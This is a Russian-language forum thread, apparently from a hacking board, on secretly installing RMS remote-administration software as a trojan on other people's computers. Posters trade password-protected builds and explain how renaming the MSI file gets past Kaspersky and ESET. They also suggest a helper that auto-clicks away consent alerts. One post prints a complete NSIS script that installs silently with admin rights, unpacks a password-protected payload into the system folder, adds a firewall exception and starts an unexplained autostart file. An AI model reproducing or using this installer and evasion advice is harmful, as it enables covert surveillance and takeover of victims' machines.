RMS - полностью скрытая установка и управление.

[Антоха]

с вас батники и инсталлер радмина, ну или только инсталлер

Тебе нужен уже подготовленный для установки?Вот можешь взять Олегов или

Вы должны зарегистрироваться, чтобы увидеть внешние ссылки

(пасс на архив:rms),разницы нет.

 

[Nedovirus]

1. Чтоб "криптануть" батник достаточно изменить имя самого msi-файла - т.е изменить в батнике его имя "rms.host5.6ru.msi" на "rOs.host5.6ru.msi" и детект каспера и нода на файл слетит.
2. Скачал сборку Антона. Это сфх-7з архив. Извлекает в темп батник и msi, запускает батник. Батник через мсэкзек запускает сам пакет, пакет ставит файлы в програмфайлс, запускает в скрытом режиме один из файлов радмина, он уже ставит службу, также запускаются и другие файлы...в итоге все это регается в системе и в конце имеем красивый алерт о том отправлять или нет - как простой вариант избавления засунуть и запустить также через тот же батник еще один файл (все равно весит много, так что 500 кб больше/меньше роли не сыграет), который будет ждать появление этого окна и как только появиться сразу его положительно закроет.


sysfiles под паролем тут я не заметил, видимо это в других сборках...

 

[Антоха]

sysfiles под паролем тут я не заметил, видимо это в других сборках...

Вы должны зарегистрироваться, чтобы увидеть внешние ссылки

та сборка (пасс:RMS).А это был простой рмс-сервер с официального сайта,без всяких добавлений,лишь сконфигурированный.

Чтоб "криптануть" батник достаточно изменить имя самого msi-файла - т.е изменить в батнике его имя "rms.host5.6ru.msi" на "rOs.host5.6ru.msi" и детект каспера и нода на файл слетит.

Неужели всё так просто..хе.

который будет ждать появление этого окна и как только появиться сразу его положительно закроет

Где то я уже это видел.Скорее всего в начале темы,в видосах.Помимо этого окошка,я думаю есть и другие.Во время работы сервера.Надо будет заюзать получше и посмотреть на оповещения.

 

[Антоха]

Чтоб "криптануть" батник достаточно изменить имя самого msi-файла - т.е изменить в батнике его имя "rms.host5.6ru.msi" на "rOs.host5.6ru.msi" и детект каспера и нода на файл слетит.

Точняк!ESS с настройками по умолчанию,даже не заикнулся при установке.
Походу больше нет никаких окошек.Все команды выполняются скрытно.Вроде должно быть окошко на подключение вебки,но у меня на виртуалке веб-камеры нет.А в целом круто.Не ожидал такого от есета.Одной буковкой обошли.
P.S.Ну да окошко видеонаблюдения присутствует

 

[Nedovirus]

Вот та сборка (пасс:RMS).А это был простой рмс-сервер с официального сайта,без всяких добавлений,лишь сконфигурированный.

Отсюда просто сказать что это и как работает или что-то еще надо сделать?

 

[Антоха]

Отсюда просто сказать что это и как работает или что-то еще надо сделать?

Немного не понял вопрос.В неофициальной сборке всё упрощено,билдер создаёт билд рмс,а также пароль и айдишник для подключения через вьювер (в официальной-айдишник приходит на почту,а пароль придумываешь сам +к этому выставляешь нужные настройки при конфигурировани сервера).Когда-то это была беспалевная сборка.Вот мы и интересовались,что в той папочке sysfiles.

 

[Nedovirus]

Там дела так обстоят:
1. Билдер создает билд, который из себя представляет NSIS-инсталлер
(по исходнику можно увидеть какие файлы инклудит и посмотреть их. пароль также виден.)

Скопировать в буфер обмена

!ifndef TARGETDIR
!define TARGETDIR ".\bin"
!endif
!addplugindir "${TARGETDIR}"
!include "ProcessFunc.nsh"
Icon "1.ico"
OutFile "build.exe"							
SilentInstall silent						 
RequestExecutionLevel admin
CRCCheck off					
 
Section "-"
		SetOutPath "$SYSDIR"			 
		SetOverwrite on
		FindFirst $1 $2 $SYSDIR\sysfiles\rutserv.exe
		StrCmp $2 "rutserv.exe" done
		File /a /r "sysfiles.7z"
		File "7z.exe"
		File "7z.dll"
		nsExec::Exec '"7z.exe" x -p1234 sysfiles.7z'
		Delete "$SYSDIR\7z.exe"
		Delete "$SYSDIR\7z.dll"
		Delete "$SYSDIR\sysfiles.7z"				
		nsExec::Exec '"$SYSDIR\sysfiles\rutserv.exe" /silentinstall'
		nsExec::Exec '"$SYSDIR\sysfiles\rutserv.exe" /firewall'
		call  RegRms 
		nsExec::Exec '"$SYSDIR\sysfiles\rutserv.exe" /start'
		Exec "$SYSDIR\sysfiles\dllhost.exe"
done:
		FindClose $1 
SectionEnd
 
	  Function RegRms
		!include "Config.nsh"
	  FunctionEnd

2. Этот нсис инсталлер, собственно, делает то, что видно выше - извлекает с помощью консольного 7z архив и запускает там по очереди файлы.

3. Итого: вместо батника, который что-то там делает это обернуто в скрипт нсисовский (ехе-файл), который по сути делает тоже самое - извлекает и запускает, только тут для большей беспалевности файлы самого радмина накрыты паролем в архиве. Можете их извлечь через ту же консоль с теми же параметрами :)
Собственно, сигнатурно билд (без запуска, тупо скан) и сейчас мало кем детектится...

 

[Антоха]

пароль также виден

Ндааа...А пароль то был простенький:)
Kaspersky Endpoint Security 10 промолчал при установке рмса с изменённой буковкой в имени.
Я удовлетворил своё любопытство,спасибо Недовирусу .

 

[Nedovirus]

а сами-то файлы радмина не палятся разве? или и у нода и у каспера нужно в настройки специально лезть чтоб такие файлы палились?

 

[X-Shar]

а сами-то файлы радмина не палятся разве? или и у нода и у каспера нужно в настройки специально лезть чтоб такие файлы палились?

По умолчанию не палятся, это потенциально-опасное ПО, нужно в настройках указывать что-бы они детектили такой тип программ, тоже и у Др. Веб...

Кстати у радмина есть цифровая подпись, что обходит и многие файерволы, правда новый каспер (2015) уведомляет об установке радмина и требует разрешения, старый-же каспер и его сканеры никак не реагирует при настройках по умолчанию.

Ещё скажу про сборку которая была на ифуде, там есть файлик "$SYSDIR\sysfiles\dllhost.exe" интересно что он делает ?

Это не файл RMS, но добавляется в автозапуск при установки рата !